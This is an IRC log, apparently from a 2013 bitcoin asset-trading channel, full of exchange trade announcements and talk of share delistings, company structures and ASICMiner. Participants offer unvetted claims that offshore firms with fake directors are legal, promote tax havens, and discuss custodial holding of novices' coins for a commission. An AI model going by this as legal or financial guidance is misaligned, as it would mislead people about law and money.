endeavours, you're best off interacting with a professional. Feb 15 02:12:18 im sure they have llc reg services there too. Feb 15 02:12:35 those cost money Feb 15 02:13:58 without money you don't need a llc anyway Feb 15 02:14:55 silly mircea_popescu, trolling is for kids Feb 15 02:15:17 i am serious. Feb 15 02:15:18 [MPEX] [S.DICE] 1000 @ 0.00608 = 6.08 BTC [-] Feb 15 02:15:24 [MPEX] [S.DICE] 45690 @ 0.006 = 274.14 BTC [-] Feb 15 02:15:26 if the cost of registering a llc is an issue then you shouldn't make one Feb 15 02:15:57 [MPEX] [S.MPOE] 9338 @ 0.00065595 = 6.1253 BTC [+] Feb 15 02:15:59 [MPEX] [S.MPOE] 1000 @ 0.00065595 = 0.656 BTC [+] Feb 15 02:16:01 [MPEX] [S.MPOE] 4212 @ 0.00065596 = 2.7629 BTC [+] Feb 15 02:16:56 mircea_popescu: lawyers cost thousands of dollars Feb 15 02:16:59 registering an llc doesnt Feb 15 02:17:17 it's like a hundred or w/e. you don't need a lawyer like on retainer in any case Feb 15 02:18:12 Namworld: you are buying s.bvps at 0.00001014 ? Feb 15 02:19:09 ;;calc 10000000 / 20 Feb 15 02:19:10 500000 Feb 15 02:19:17 seems tomorrow at this time i'll be liquidating my client's holdings by selling at mkt price, you can't offer more? Feb 15 02:19:18 ya but as in all endeavours, you're best off interacting with a professional. - good advice Feb 15 02:20:08 problem is mircea nobody wants to pay for anything haha Feb 15 02:20:12 I wouldn't liquidate at market price, we're moving to BTCT.co and we might just buyback shares Feb 15 02:20:24 ya well. Feb 15 02:20:42 might Feb 15 02:20:45 i think a LLP is better than a LLC Feb 15 02:20:56 BitHub: no it isnt. Feb 15 02:20:57 yeah, well we're a bit short on funds. Feb 15 02:20:58 Namworld: "probably" "might" ? these solid plans of yours again, eh? Feb 15 02:21:01 its like a company but not so official and you get alot of benefits Feb 15 02:21:19 I can't make decisions for everyone, I'm not alone in this. Feb 15 02:21:28 But BitVPS is going very well. Feb 15 02:21:53 Within a year it should turn quite profitable. Feb 15 02:22:00 so you three or four can't even decide on buyback price and just place mpex order? Feb 15 02:22:16 not very good outlook for bitvps if you can;t agree on such simpel thing Feb 15 02:22:42 The others are broke. And I can't afford to buyback either. Feb 15 02:22:57 We'd like to buy back shares eventually. Feb 15 02:23:25 currently am thinking to completely shut down and unregister australian operations, keep everything personalized, keep everything in btc, never let the company touch fiat, might look into setting up offsore LLC with fake company directors (this is all perfectly legal) Feb 15 02:23:33 why don't you sell on btct then? Feb 15 02:23:46 ;;ticker btct bitvps Feb 15 02:23:46 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Feb 15 02:23:50 !ticker btct bitvps Feb 15 02:23:52 [BTCT:BITVPS] 1D: -- / -- / -- (0 shares, 0 BTC), 7D: -- / 0.0 / -- (0 shares, 0 BTC), 30D: -- / 0.0 / -- (0 shares, 0 BTC) Feb 15 02:24:04 Why sell? Feb 15 02:24:13 cuz you're broke, lol Feb 15 02:24:33 BitHub: you do realize, though, an LLP is a partnership, right? Feb 15 02:24:37 The individuals are broke. BitVPS is about breaking even. Feb 15 02:24:41 yes D3 Feb 15 02:24:46 i am currently in a partnership Feb 15 02:24:50 We're buying servers with what we have to reduce monthly expenses. Feb 15 02:24:54 yeah, see, I am not Feb 15 02:24:56 and condensing clients a bit. Feb 15 02:25:06 than a LLC is the next best thing Feb 15 02:25:09 The current servers are monthly rent and a bit empty Feb 15 02:25:26 what does that have with selling shares? Feb 15 02:25:29 D3 we will probably upgrade from a LLP to a LLC if we do a offshore company. Feb 15 02:25:35 We're nto going to sell shares. Feb 15 02:26:17 Trading will resume when we're delisted and people start getting moved. Feb 15 02:27:46 as for low bids, I have low bids on everything, but that's my personal account and I put low bids on everything, as you might have noticed. Feb 15 02:27:59 i'm starting to think its better to not have your bitcoin company based where you live, better off having it in a tax haven sort of place or somewhere a bit protected from western laws. The biggest liability a bitcoin business gives you is the ability for the gov to fuck you for not doing your taxes properly Feb 15 02:28:03 i'm not interested to protract this process. i'll just sell the stuf fat whatever price and send the users after you. Feb 15 02:29:04 yeah, must not fit nicely with coin.br Feb 15 02:29:32 i was thinking you already started to move the shares, using MPEx PUSH function to accept shares to be moved to btct Feb 15 02:29:40 and so i told the users Feb 15 02:30:06 but you're waiting to muck with STAT verification instead... Feb 15 02:30:23 No Feb 15 02:30:47 I'll be accepting a signature from the same gpg key MPEx will give us. Feb 15 02:31:09 MPEx is supposed to give us a list of key with the amount of shares tied to it on delisting. Feb 15 02:31:24 A simple signature from the gpg key used for MPEx will suffice. Feb 15 02:32:11 We can even use email addresses to import, if your users give authorization for their email to be disclosed, + signature of your holdings Feb 15 02:32:28 and I'll manage their import to BTCT.co Feb 15 02:32:33 Okay. Now, why this isn't announced in condensed form I can get an URL of, instead i have to collect this information from btctalk and irc? Feb 15 02:34:02 MPEx has no method to send announcement. Plus I'm here almost everyday. I think you know that by now. I haven't seen you asking before, although I see you here almost daily too =/ Feb 15 02:35:19 ;;calc 10000000 / 20 Feb 15 02:35:21 500000 Feb 15 02:35:28 i was asking on btctalk... got less information than now, with plenty of "perhaps" Feb 15 02:35:31 so hrm Feb 15 02:36:14 [MPEX] [S.MPOE] 7000 @ 0.00065596 = 4.5917 BTC [+] Feb 15 02:36:49 and your announcement about the bonds made me ask.. Feb 15 02:37:04 cuz i just can't understand why you're so lewd in communicating with shareholders Feb 15 02:38:18 can't you just hire a $10 writer from freelancer to make a statement... oh you're broke i forgot Feb 15 02:38:54 >$10 Feb 15 02:38:56 >freelancer Feb 15 02:39:04 I cant imagine it coming out any better Feb 15 02:40:12 I'm not broke personally, but making a buyback at ~0.003 for all circulating shares, I can't do that right now. Feb 15 02:40:17 Neither is arij. Feb 15 02:41:21 But we don't have money aside for that either. Would take a good chunk. Feb 15 02:42:34 i see. rg's contract says equity is 1200BTC (0.0012 BTC each) Feb 15 02:42:50 he should pay then, no? Feb 15 02:43:20 If you want that, I suppose. Feb 15 02:43:59 i don't have them anymore, no "wants" there. Feb 15 02:44:23 just that he broke the contract, so i guess he's obliged to repay at least the equity to shareholders Feb 15 02:44:57 Still, seems preferable to handle a transfer and let each coinbr user decide what they want to do with theirs. Feb 15 02:45:41 yes i gave them two options Feb 15 02:45:50 http://www.bitcoinforum.com/coinbr-com/s-bvps-delists-soon-action-from-shareholders-required-till-february-15th/ Feb 15 02:45:58 sent also by email Feb 15 02:46:31 almost 2 weeks ago and no one asked about transfer so far... so they'll be liquidated. punt. Feb 15 02:47:22 Ouch Feb 15 02:47:49 How many shares? Feb 15 02:48:07 not many Feb 15 02:48:42 PM Feb 15 02:49:02 it's users responsibility not mine. Feb 15 02:49:18 what am i going to, create btct account? why? Feb 15 02:49:36 Not needed. Feb 15 03:03:40 wow guys, i cant believe someone actually paid me back on btcjam Feb 15 03:03:42 happy days. Feb 15 03:04:02 [MPEX] [S.MPOE] 7200 @ 0.00065596 = 4.7229 BTC [+] Feb 15 03:08:18 [MPEX] [S.DICE] 400 @ 0.0062799 = 2.512 BTC [+] Feb 15 03:08:19 [MPEX] [S.DICE] 932 @ 0.00628 = 5.853 BTC [+] Feb 15 03:08:21 [MPEX] [S.DICE] 4000 @ 0.0062999 = 25.1996 BTC [+] Feb 15 03:08:22 [MPEX] [S.DICE] 1000 @ 0.00629999 = 6.3 BTC [+] Feb 15 03:08:23 [MPEX] [S.DICE] 3561 @ 0.0063 = 22.4343 BTC [+] Feb 15 03:08:24 [MPEX] [S.DICE] 10000 @ 0.00635 = 63.5 BTC [+] Feb 15 03:08:26 [MPEX] [S.DICE] 107 @ 0.00639987 = 0.6848 BTC [+] Feb 15 03:09:18 [MPEX] [S.DICE] 893 @ 0.00639987 = 5.7151 BTC [+] Feb 15 03:09:20 [MPEX] [S.DICE] 2000 @ 0.00639989 = 12.7998 BTC [+] Feb 15 03:09:22 [MPEX] [S.DICE] 2000 @ 0.00639998 = 12.8 BTC [+] Feb 15 03:09:23 [MPEX] [S.DICE] 5000 @ 0.00639999 = 32 BTC [+] Feb 15 03:09:25 [MPEX] [S.DICE] 10107 @ 0.0064 = 64.6848 BTC [+] Feb 15 03:09:57 [MPEX] [S.DICE] 1574 @ 0.0064 = 10.0736 BTC [+] Feb 15 03:09:59 [MPEX] [S.DICE] 700 @ 0.00640186 = 4.4813 BTC [+] Feb 15 03:10:01 [MPEX] [S.DICE] 5000 @ 0.00641 = 32.05 BTC [+] Feb 15 03:10:02 [MPEX] [S.DICE] 1700 @ 0.00674999 = 11.475 BTC [+] Feb 15 03:12:45 [MPEX] [S.DICE] 11000 @ 0.0069 = 75.9 BTC [+] Feb 15 03:17:18 Jurov, btct has enough of an api now that you could broker assets there too Feb 15 03:17:37 you could go 3-legged and not have to do a central db/management Feb 15 03:17:43 or just go 2-legged like you are with mpex Feb 15 03:18:52 docs here: https://btct.co/faq?tab=tab5 ... they're a work in progress, but I'm happy to answer any questions. Feb 15 03:19:52 I have a basic LAMP ready client you can download and pull apart, it's linked as a .zip on that page. Feb 15 03:19:55 thanks, will consider it. Feb 15 03:21:54 burnside you see for yourself: if this was planned/announced better in advance, i'd be aware sooner of all possibilities... Feb 15 03:22:34 yeah, there's been lots of time to plan, announcement was some time ago. Feb 15 03:23:22 communication could be better, no doubt. Feb 15 03:31:55 inaba delivery confidence speaks: 100 BTC that BFL will deliver ASICs. I only put the 2013 timeframe on there so there's a definitive endpoint to the bet, even though it will be over long before then. Feb 15 03:32:04 So, october it is, 2013 this time. Feb 15 03:36:54 [BTCTC] [S.MPOE-PT] 9 @ 0.00067 = 0.006 BTC [+] Feb 15 03:39:28 [BTCTC] [RSM] 1 @ 0.0099 BTC [+] Feb 15 04:03:58 [MPEX] [S.MPOE] 41000 @ 0.00065596 = 26.8944 BTC [+] Feb 15 04:12:02 [MPEX] [S.MPOE] 4321 @ 0.00065083 = 2.8122 BTC [-] Feb 15 04:12:09 [MPEX] [S.MPOE] 7511 @ 0.00065079 = 4.8881 BTC [-] Feb 15 04:13:10 [BTCTC] [GSDPT] 3 @ 0.00626 = 0.0188 BTC [+] Feb 15 04:26:27 ;;ticker Feb 15 04:26:28 BTCUSD ticker | Best bid: 27.31002, Best ask: 27.40000, Bid-ask spread: 0.08998, Last trade: 27.40000, 24 hour volume: 106786.27768202, 24 hour low: 24.50000, 24 hour high: 27.59690, 24 hour vwap: 26.35512 Feb 15 04:27:53 kakobrekla by the time last block is mined bfl delivers fo sho. Feb 15 04:28:13 hehe Feb 15 04:28:16 it may be juicers or toasters or something, not necessarily asics Feb 15 04:28:17 how can i maximize my investments? Feb 15 04:28:22 but it will be SOMETHING! Feb 15 04:28:32 i would like to earn back 1btc a day Feb 15 04:29:45 what else can you do besides, investing and loaning? Feb 15 04:29:59 that'd be it no ? Feb 15 04:30:07 ;;seen smickles Feb 15 04:30:07 smickles was last seen in #bitcoin-assets 6 days, 0 hours, 19 minutes, and 27 seconds ago: pong Feb 15 04:30:18 i'm not sure mircea Feb 15 04:30:19 Oh man where has he been it's been like a week Feb 15 04:30:24 maybe that's all i can do for now Feb 15 04:30:35 i'm meeting with business partner, going to show him mpex Feb 15 04:30:46 smickles: hey gimme a pong when you're back from vacation ;) Feb 15 04:32:09 BitHub well, i mean in general speaking. bonds and equity, loans and investments. what else is there ? Feb 15 04:32:29 mining Feb 15 04:32:31 [MPEX] [S.DICE] 100 @ 0.0065 = 0.65 BTC [-] Feb 15 04:32:34 that's investing neh ? Feb 15 04:32:47 sell shit for bitcoins yo Feb 15 04:32:53 stop trying to be a speculator Feb 15 04:32:55 and laaazy Feb 15 04:33:24 why not just sell all your bitcoins and give your money to the government they know what is best for you Feb 15 04:33:34 haha k Feb 15 04:33:43 i'd rather give it to strippers. Feb 15 04:33:48 equally clueless but at least tits. Feb 15 04:34:09 i like giving money to women Feb 15 04:34:12 makes life so much easier Feb 15 04:34:39 I can't believe .04btc is a 1 USD now Feb 15 04:34:48 fo reals. Feb 15 04:34:54 anyway, im out. take care all. Feb 15 04:34:59 peace **** BEGIN LOGGING AT Fri Feb 15 12:36:49 2013 Feb 15 12:37:33 lol the best one http://i.imgur.com/lVvXSEv.jpeg Feb 15 12:38:53 lol Feb 15 12:56:05 http://rt.com/news/meteorite-crash-urals-chelyabinsk-283/ meteor! Feb 15 13:10:56 [MPEX] [S.MPOE] 2501 @ 0.00065521 = 1.6387 BTC [+] Feb 15 13:10:58 [MPEX] [S.MPOE] 4321 @ 0.00065586 = 2.834 BTC [+] Feb 15 13:10:59 [MPEX] [S.MPOE] 3578 @ 0.00065587 = 2.3467 BTC [+] Feb 15 13:14:28 ;; ticker Feb 15 13:14:29 BTCUSD ticker | Best bid: 26.50300, Best ask: 26.62363, Bid-ask spread: 0.12063, Last trade: 26.62363, 24 hour volume: 71545.81308642, 24 hour low: 25.64000, 24 hour high: 27.59690, 24 hour vwap: 26.79017 Feb 15 13:21:37 hey all Feb 15 13:21:57 hi Feb 15 13:27:47 [MPEX] [S.MPOE] 4388 @ 0.00065587 = 2.878 BTC [+] Feb 15 13:27:49 [MPEX] [S.MPOE] 2412 @ 0.0006588 = 1.589 BTC [+] Feb 15 13:28:04 shouldn't you be doing something useful mr. popescu Feb 15 13:29:13 if i ever figure out what it'd be. Feb 15 13:29:29 finding a surefire method for guys to get laid? Feb 15 13:31:25 as long as the guys are me i kinda have that. Feb 15 13:36:08 ahahah that works ? Feb 15 13:39:59 sooo asicminer has like 70k usd in bills to pay ? Feb 15 13:41:04 how big Feb 15 13:41:29 70k + 70k actually. Feb 15 13:41:48 smart of them that they have liabilities denominated in fiat tho. Feb 15 13:42:53 oh jesus Feb 15 13:43:19 oh well, have faith Feb 15 13:43:23 hopefully get some divs Feb 15 13:44:07 yeah true mirceas as the price of btc rises. Feb 15 13:44:20 [MPEX] [S.MPOE] 3400 @ 0.00065562 = 2.2291 BTC [-] Feb 15 13:45:02 this recent jump hel[ed them a lot. Feb 15 13:45:29 25 blocks * 25 btc = 20k rather than 10k Feb 15 13:45:52 but still, they need 10x as much to break even on the various loans. who knows, maybe they make it. Feb 15 13:46:15 did you read friedcats update today? Feb 15 13:46:50 they'll probably raise alot of money once they sort out their share situation and actually put it on the market Feb 15 13:47:11 that's always good to have in your back pocket Feb 15 13:47:54 well... Feb 15 13:47:59 how do they raise money ? Feb 15 13:48:08 their shares are already sold, at .1 each, for 40k btc. Feb 15 13:48:11 back in june or w/e Feb 15 13:49:03 i think they got some more for this bitfountain thing Feb 15 13:49:31 but they can't sell those ? Feb 15 13:49:36 and are holding alot themselves to sell later to raise money, plus a whole bunch of other things, friedcat just did a upgrade recently Feb 15 13:49:38 basically asicminer ipod on a copy of mpex contracts Feb 15 13:49:42 let me look Feb 15 13:49:44 the company always keeps half the shares Feb 15 13:49:50 and the shareholders can buy the other half. Feb 15 13:50:07 it's not quite as clearly stated as on mpex, but it's the principle. Feb 15 13:50:57 they would be silly to have sold out all their shares Feb 15 13:51:15 so so silly Feb 15 13:51:27 they have tho Feb 15 13:51:36 made 400k, sold 200k at .1 each for 20k btc Feb 15 13:51:42 about 150k usd at the time Feb 15 13:51:51 100-150, something like that. Feb 15 13:52:11 they may have ended up with some leftovers since glbse exploded and maybe some people didn't claim Feb 15 13:52:19 but in any case i'd be surprised if it were much %wise Feb 15 13:52:33 https://bitcointalk.org/index.php?topic=99497.1700 Feb 15 13:52:36 scroll down a bit Feb 15 13:53:29 This is what in our mind when doing the IPO: Feb 15 13:53:29 1. One ASICMINER (A) share is one privileged share of our partnership (A+B) compared to Bitfountain (B) shares controlled by us founders. Feb 15 13:53:29 2. The privileges (investor protection) are exactly the four ones listed in the main thread. Besides privileges, one ASICMINER share is no different to one Bitfountain share. This means that ASICMINER shareholders also pay for maintainance and re-investment, same as the rest of us three, while at the same time also enjoy the future benefits made possible from the maintainance and Feb 15 13:53:29 re-investment costs. This is why we stated that ASICMINER shareholders are always in a better position than any device buyers when the initial biggest risk disappeared. Feb 15 13:53:29 3. The rest shares, when not sold, are kept and owned by Bitfountain. When they are sold, all income will be invested in our partner ship (A+B). This is what the non-dilution privilege of ASICMINER share means. They may be sold someday when the price is right and we need really big investment costs. But now the price is not fully appreciated in our point of view and the re-investment Feb 15 13:53:29 cost in the mid-term won't be so big that we have to sell them low. Feb 15 13:53:29 4. About the portion concerns, we believe that the evaluation of (A+B) on IPO is fair to ASICMINER purchasers, because it's already much lower than most other startups seeking for angel investments. The investor protection clauses are also a pro. Of course, most angels/VCs will get more information and control, but we could still debate whether this aspect can neutralize the advantages Feb 15 13:53:30 from low evaluation and privileges. Feb 15 13:53:36 opps, sorry Feb 15 13:54:53 what do you read into that ? Feb 15 13:55:24 you're the expert :P Feb 15 13:56:12 so they can sell shares to raise funds if they really need to i guess. Feb 15 13:56:19 basically, they're very convolutedly going about implementing a mpex contract. Feb 15 13:56:28 no, because they already issued and they promised not to dillute. Feb 15 13:56:42 3. The rest shares? Feb 15 13:57:01 "when" Feb 15 13:57:11 afaik there's no actual shares in that group Feb 15 13:57:14 not till the price is right, or really needed Feb 15 13:57:18 if there are any i'd be surprised there be very many. Feb 15 13:57:28 afaik glbse listed them at 200k shares, so, that would be "all" Feb 15 13:57:28 but "bitfountain" will be owning them. Feb 15 13:57:44 looky : this company already issued its shares, on glbse Feb 15 13:57:48 they were privately held. Feb 15 13:57:51 correct Feb 15 13:58:05 so... maybe some people didn't claim them, and so i guess they may revert to bitfountain Feb 15 13:58:11 but otherwise, there's nothing more to sell. Feb 15 13:58:15 okey, so they wont be issuing any more than 200k shares in total now or in the future. Feb 15 13:58:21 its what they said. Feb 15 13:58:29 that's good in a way. Feb 15 13:58:38 (which is a silly thing to say, but hey) Feb 15 13:58:58 too many s.dice shares out there :P Feb 15 13:59:34 actually let's see. if they mine about 15 blocks a day consistently that's Feb 15 13:59:38 ;;calc 15 * 25 * 30 Feb 15 13:59:39 11250 Feb 15 13:59:46 about par with s.dice Feb 15 13:59:53 we were playing with some calcs in the lobby Feb 15 14:00:01 course, they have about Feb 15 14:00:02 i think its 25 blocks? Feb 15 14:00:11 ;;calc 150 / 28 Feb 15 14:00:12 5.35714285714 Feb 15 14:00:25 5.5k worth of debt, but that's not such a big deal Feb 15 14:00:43 they do have electricity/maintenance costs, and there is the risk their miners blow up (which eventually they will, these things wear) Feb 15 14:00:58 we roughly worked as an investor you need to buy about 266 shares at .4 for about 106 btc Feb 15 14:01:00 out* Feb 15 14:01:10 to make 1btc a day off the divs Feb 15 14:01:13 so as it is currently i guess asicminer is worth maybe 2-400k BTC if it were listed on MPEx Feb 15 14:01:23 so takes about 3- half months to make your money back Feb 15 14:01:24 which would make each share worth up to BTC even. Feb 15 14:01:26 wow. Feb 15 14:01:55 of course current rate of return won't last, but what ever lasts. Feb 15 14:01:58 there was a bunch of us in #bitcoin working it out :) not sure of exact figures but it was pretty close to that Feb 15 14:02:19 im curious if they end up shootingthemselves in the foot by listing on some illiquid platform and never realising those prices tho Feb 15 14:02:43 cant someone create one on mpex? Feb 15 14:02:48 one what ? Feb 15 14:02:50 a p.t Feb 15 14:02:57 if i allow that someone Feb 15 14:03:00 asicminer pass thru share Feb 15 14:03:02 hehe ;) Feb 15 14:03:16 which i might, if they're credible. Feb 15 14:04:12 have you recieved any legal issues yet? Feb 15 14:05:11 what do you mean ? Feb 15 14:07:01 with mpex, all good so far? Feb 15 14:12:22 a, sure. Feb 15 14:12:34 you mean have i been sued or anything ? Feb 15 14:13:13 oh not sued but emails n stuff like threating what you guys are doing? Feb 15 14:13:39 well threating to sue i guess Feb 15 14:15:05 nope, nothing at all. Feb 15 14:15:44 sweet Feb 15 14:16:27 FabianB_ Feb 15 14:16:29 oops Feb 15 14:16:29 i was thinking about what you were saying when we first talked, about keeping things offshore, keeping everything in btc, no fiat. I think its the better way to go. Feb 15 14:16:54 i don't recall this particular one, but yes btc accounting is the better way. Feb 15 14:18:52 yeah i said to my partner, why are we so egar to turn btc back into cash? better off just taking as much fiat as you can and turning it all into btc and you can leverage it alot more, and if we really need more, we can just cash out now and again. Feb 15 14:18:59 some money* Feb 15 14:19:58 mircea_popescu: huh? Feb 15 14:20:19 pm. Feb 15 14:24:58 morning Feb 15 14:25:18 by that i mean 4:25 an Feb 15 14:25:22 am Feb 15 14:29:04 heya Feb 15 14:30:08 http://finance.yahoo.com/news/dying-dollar-why-us-currency-213606781.html Feb 15 14:30:09 heh. Feb 15 14:30:43 [MPEX] [S.MPOE] 3200 @ 0.00065474 = 2.0952 BTC [-] Feb 15 14:30:51 hah Feb 15 14:34:08 have you guys seen pbsideachannel's bitcoin video Feb 15 14:34:28 it's about how bitcoin and hats.. yes hats are changing currency. Feb 15 14:34:52 and before I was a bitcoiner, I first had my hand trading hats... hats! Feb 15 14:35:05 so I graduated from hats, and switched to bitcoin Feb 15 14:36:38 lol Feb 15 14:36:42 is this etsy university ? Feb 15 14:36:55 also in the news, https://bitcointalk.org/index.php?topic=144319.0 Feb 15 14:39:03 Bowjob: url? Feb 15 14:39:42 http://www.youtube.com/watch?v=E_9R45RLNR0 Feb 15 14:39:56 I take a few issues with the way he described TF2 economy though. Feb 15 14:40:13 it's a rare scenario where peole use metal to buy hats. Feb 15 14:40:51 rather you use earbuds to purchase hats and keys and a bunny head and a beret to purchase unusuals Feb 15 14:41:51 also, santa hats and gift boxes are used to purchase goods in tf2.. similar to how we have different bills irl Feb 15 14:42:30 buying unusuals with metal is like buying a ferrarri with pennies. it clogs you inventory space. Feb 15 14:42:34 apart from that, good vid Feb 15 14:48:11 [MPEX] [S.MPOE] 1950 @ 0.00065474 = 1.2767 BTC [-] Feb 15 14:54:38 ;;asks 30 Feb 15 14:54:40 There are currently 31025.047 bitcoins offered at or under 30.0 USD, worth 882899.724413 USD in total. Feb 15 14:54:48 ;;asks 32 Feb 15 14:54:50 There are currently 35308.208 bitcoins offered at or under 32.0 USD, worth 1016698.74139 USD in total. Feb 15 14:55:47 whaT? Feb 15 14:56:04 ;;tocler Feb 15 14:56:04 Error: "tocler" is not a valid command. Feb 15 14:56:11 ;;ticker Feb 15 14:56:11 BTCUSD ticker | Best bid: 26.48457, Best ask: 26.50180, Bid-ask spread: 0.01723, Last trade: 26.50181, 24 hour volume: 79278.52254235, 24 hour low: 25.64000, 24 hour high: 27.59690, 24 hour vwap: 26.77956 Feb 15 14:56:18 oh Feb 15 15:13:40 [MPEX] [S.MPOE] 4119 @ 0.00065474 = 2.6969 BTC [-] Feb 15 15:13:42 [MPEX] [S.MPOE] 301 @ 0.00065562 = 0.1973 BTC [+] Feb 15 15:13:43 [MPEX] [S.MPOE] 5790 @ 0.0006588 = 3.8145 BTC [+] Feb 15 15:18:14 we should get a FOIA request for bitcoin. Feb 15 15:18:22 see what the government has written about it already. Feb 15 15:21:15 [MPEX] [S.MPOE] 13000 @ 0.00066004 = 8.5805 BTC [+] Feb 15 15:21:17 [MPEX] [S.MPOE] 1664 @ 0.00066112 = 1.1001 BTC [+] Feb 15 15:21:20 [MPEX] [S.MPOE] 9418 @ 0.00066133 = 6.2284 BTC [+] Feb 15 15:21:22 [MPEX] [S.MPOE] 4368 @ 0.00066171 = 2.8903 BTC [+] Feb 15 15:26:09 http://say26.com/meteorite-in-russia-all-videos-in-one-place Feb 15 15:30:04 [MPEX] [S.MPOE] 1032 @ 0.00066171 = 0.6829 BTC [+] Feb 15 15:30:18 http://www.nasa.gov/topics/solarsystem/features/asteroidflyby.html Feb 15 15:35:09 we went back to 26.39 levels Feb 15 15:40:39 ask walls at 27.4 Feb 15 15:48:04 [MPEX] [S.DICE] 3650 @ 0.00630919 = 23.0285 BTC [-] Feb 15 15:51:25 [MPEX] [S.MPOE] 4879 @ 0.00066202 = 3.23 BTC [+] Feb 15 15:51:27 [MPEX] [S.MPOE] 4000 @ 0.00066221 = 2.6488 BTC [+] Feb 15 15:51:30 [MPEX] [S.MPOE] 61 @ 0.00066261 = 0.0404 BTC [+] Feb 15 15:51:57 [MPEX] [S.DICE] 100 @ 0.00649174 = 0.6492 BTC [+] Feb 15 15:56:14 [MPEX] [S.MPOE] 3500 @ 0.00066261 = 2.3191 BTC [+] Feb 15 16:00:32 [MPEX] [S.MPOE] 1400 @ 0.00066261 = 0.9277 BTC [+] Feb 15 16:04:41 so guys, am I evil if I'm gonna hold other people's funds for 10% in BTC since they can't figure the wallet out? Feb 15 16:05:03 they want to invest in BTC but they can't be bothered to learn how it woks, ect Feb 15 16:05:31 I agreed but only to 150 bucks worth.. I don't want them crying when their coins become worth shit Feb 15 16:07:26 but.... Feb 15 16:07:28 that will never happen, right? Feb 15 16:07:30 RIGHT???? Feb 15 16:08:03 who knows Feb 15 16:08:17 I told them about it when it was around 15 dollars each Feb 15 16:08:28 didnt want to act till they were 25 dollars Feb 15 16:08:38 now.. they want to swarm me with dollars Feb 15 16:09:07 well Feb 15 16:09:07 I told them its stupidly easy to get it.. and initially I didn't want to hold their coins Feb 15 16:09:13 tbh it will go to 50 usd easily Feb 15 16:09:19 y¨' Feb 15 16:09:20 well Feb 15 16:09:23 just... Feb 15 16:09:24 then.. I thought, heck. that 10% could be 1000 bucks in the future Feb 15 16:09:25 or more Feb 15 16:09:29 point them to bitaddress.org Feb 15 16:09:31 and its free money Feb 15 16:09:32 and make them print paper wallets Feb 15 16:09:44 no dude. these are technically impaired people Feb 15 16:09:49 well Feb 15 16:09:54 print them the paper wallets Feb 15 16:09:58 [MPEX] [S.MPOE] 2866 @ 0.00065979 = 1.891 BTC [-] Feb 15 16:09:59 who work menial jobs, ect hoping a quick buck Feb 15 16:09:59 [MPEX] [S.MPOE] 4321 @ 0.00065342 = 2.8234 BTC [-] Feb 15 16:10:02 [MPEX] [S.MPOE] 11189 @ 0.00065341 = 7.311 BTC [-] Feb 15 16:10:04 [MPEX] [S.MPOE] 3050 @ 0.00065174 = 1.9878 BTC [-] Feb 15 16:10:09 or a "longshot" to getting rich Feb 15 16:10:14 well Bowjob sell them f2f coins and sent them to their paper wallets Feb 15 16:10:28 send*' Feb 15 16:11:06 actually, I thought of putting it in my brain wallet instead.. they run the risk of me dying and not getting their shit back though Feb 15 16:11:27 imo paper wallet is easier Feb 15 16:11:30 paper wallets they own Feb 15 16:11:38 and sell them f2f the coins Feb 15 16:11:44 f2f? Feb 15 16:11:48 face to face Feb 15 16:11:48 i mean Feb 15 16:11:57 lol Feb 15 16:11:59 well Feb 15 16:12:05 make paper wallet, put like 10 btc in it and sell it for 10 btc worth of usd to them Feb 15 16:12:20 it hurts me to sell bitcoin. idk why lol Feb 15 16:12:24 ..... Feb 15 16:12:33 buy the bitcoins from market with the dollarzss Feb 15 16:12:45 then put _those_ bitcoins in the paper wallet.. Feb 15 16:12:51 well see if they'll agree Feb 15 16:13:08 I get my 10% commision either way Feb 15 16:26:20 [MPEX] [S.MPOE] 4321 @ 0.00065205 = 2.8175 BTC [+] Feb 15 16:26:22 [MPEX] [S.MPOE] 1378 @ 0.00065174 = 0.8981 BTC [-] Feb 15 16:31:20 Bowjob: don't sell, you'll make more by holding Feb 15 16:31:52 of course. thats why they hand me the cash first, then purchase bitcoins at the spot rate Feb 15 16:32:01 then hold their coins for them Feb 15 16:32:16 I think 10% is kinda steep, but it wasnt my idea Feb 15 16:32:17 lol Feb 15 16:42:39 [BTCTC] [RSM] 1 @ 0.0099 BTC [+] Feb 15 16:45:12 [MPEX] [S.MPOE] 39 @ 0.00066261 = 0.0258 BTC [+] Feb 15 16:45:14 [MPEX] [S.MPOE] 4261 @ 0.00066328 = 2.8262 BTC [+] Feb 15 16:48:41 [MPEX] [S.MPOE] 5360 @ 0.00065174 = 3.4933 BTC [-] Feb 15 16:48:42 [MPEX] [S.MPOE] 1840 @ 0.0006508 = 1.1975 BTC [-] Feb 15 16:52:01 [BTCTC] [GSDPT] 1 @ 0.00627 BTC [+] Feb 15 16:58:11 [HAVELOCK] [SDICE] 4 @ 0.749 = 2.996 BTC [+] Feb 15 16:58:13 [HAVELOCK] [SDICE] 3 @ 0.7499999 = 2.25 BTC [+] Feb 15 16:58:13 [HAVELOCK] [SDICE] 30 @ 0.75 = 22.5 BTC [+] Feb 15 17:01:20 [MPEX] [S.MPOE] 2481 @ 0.0006508 = 1.6146 BTC [-] Feb 15 17:01:22 [MPEX] [S.MPOE] 4603 @ 0.0006508 = 2.9956 BTC [-] Feb 15 17:36:11 [HAVELOCK] [SDICE] 73 @ 0.75 = 54.75 BTC [+] Feb 15 17:42:43 ;;ticker Feb 15 17:42:43 BTCUSD ticker | Best bid: 27.11726, Best ask: 27.15525, Bid-ask spread: 0.03799, Last trade: 27.16598, 24 hour volume: 81022.17859612, 24 hour low: 25.82200, 24 hour high: 27.59690, 24 hour vwap: 26.83371 Feb 15 17:43:05 ;;bc,24hprc Feb 15 17:43:06 26.84 Feb 15 17:54:12 when the price hits 58.50 I'll be happy Feb 15 17:56:40 ;;slap gribble Feb 15 18:09:58 http://youtu.be/2F6YkBa_Tig Feb 15 18:16:41 [MPEX] [S.MPOE] 6767 @ 0.00065081 = 4.404 BTC [+] Feb 15 18:16:42 [MPEX] [S.MPOE] 3483 @ 0.0006508 = 2.2667 BTC [-] Feb 15 18:28:34 iz: if she wasnt already married, I'd marry her Feb 15 18:33:10 [HAVELOCK] [SDICE] 9 @ 0.759 = 6.831 BTC [+] Feb 15 18:36:10 [HAVELOCK] [SDICE] 1 @ 0.759 BTC [+] Feb 15 18:39:02 [MPEX] [S.MPOE] 11200 @ 0.00065115 = 7.2929 BTC [+] Feb 15 18:39:04 [MPEX] [S.MPOE] 4700 @ 0.00065935 = 3.0989 BTC [+] Feb 15 